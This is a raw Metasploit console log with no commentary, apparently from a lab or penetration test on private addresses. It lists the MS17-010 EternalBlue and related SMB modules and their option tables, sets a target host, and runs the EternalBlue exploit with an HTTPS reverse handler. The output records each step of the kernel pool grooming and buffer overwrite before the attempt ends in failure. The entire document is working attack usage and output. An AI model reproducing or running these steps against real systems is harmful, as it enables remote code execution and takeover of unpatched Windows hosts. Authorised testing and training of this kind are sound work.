# Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution 1 auxiliary/scanner/smb/smb_ms17_010 normal No MS17-010 SMB RCE Detection 2 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption 3 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ 4 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution 5 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 445 yes The target port (TCP) SMBDomain . no (Optional) The Windows domain to use for authentication SMBPass no (Optional) The password for the specified username SMBUser no (Optional) The username to authenticate as VERIFY_ARCH true yes Check if remote architecture matches exploit Target. VERIFY_TARGET true yes Check if remote OS matches exploit Target.
Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 172.16.26.213 yes The local listener hostname LPORT 8443 yes The local listener port LURI no The HTTP Path
Exploit target:
Id Name -- ---- 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 172.16.26.238 rhosts => 172.16.26.238 msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started HTTPS reverse handler on https://172.16.26.213:8443 [*] 172.16.26.238:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 172.16.26.238:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit) [*] 172.16.26.238:445 - Scanned 1 of 1 hosts (100% complete) [*] 172.16.26.238:445 - Connecting to target for exploitation. [+] 172.16.26.238:445 - Connection established for exploitation. [+] 172.16.26.238:445 - Target OS selected valid for OS indicated by SMB reply [*] 172.16.26.238:445 - CORE raw buffer dump (53 bytes) [*] 172.16.26.238:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2 [*] 172.16.26.238:445 - 0x00000010 30 30 38 20 52 32 20 45 6e 74 65 72 70 72 69 73 008 R2 Enterpris [*] 172.16.26.238:445 - 0x00000020 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50 e 7601 Service P [*] 172.16.26.238:445 - 0x00000030 61 63 6b 20 31 ack 1 [+] 172.16.26.238:445 - Target arch selected valid for arch indicated by DCE/RPC reply [*] 172.16.26.238:445 - Trying exploit with 12 Groom Allocations. [*] 172.16.26.238:445 - Sending all but last fragment of exploit packet [*] 172.16.26.238:445 - Starting non-paged pool grooming [+] 172.16.26.238:445 - Sending SMBv2 buffers [+] 172.16.26.238:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer. [*] 172.16.26.238:445 - Sending final SMBv2 buffers. [*] 172.16.26.238:445 - Sending last fragment of exploit packet! [*] 172.16.26.238:445 - Receiving response from exploit packet [+] 172.16.26.238:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)! [*] 172.16.26.238:445 - Sending egg to corrupted connection. [*] 172.16.26.238:445 - Triggering free of corrupted buffer. [-] 172.16.26.238:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 172.16.26.238:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [-] 172.16.26.238:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=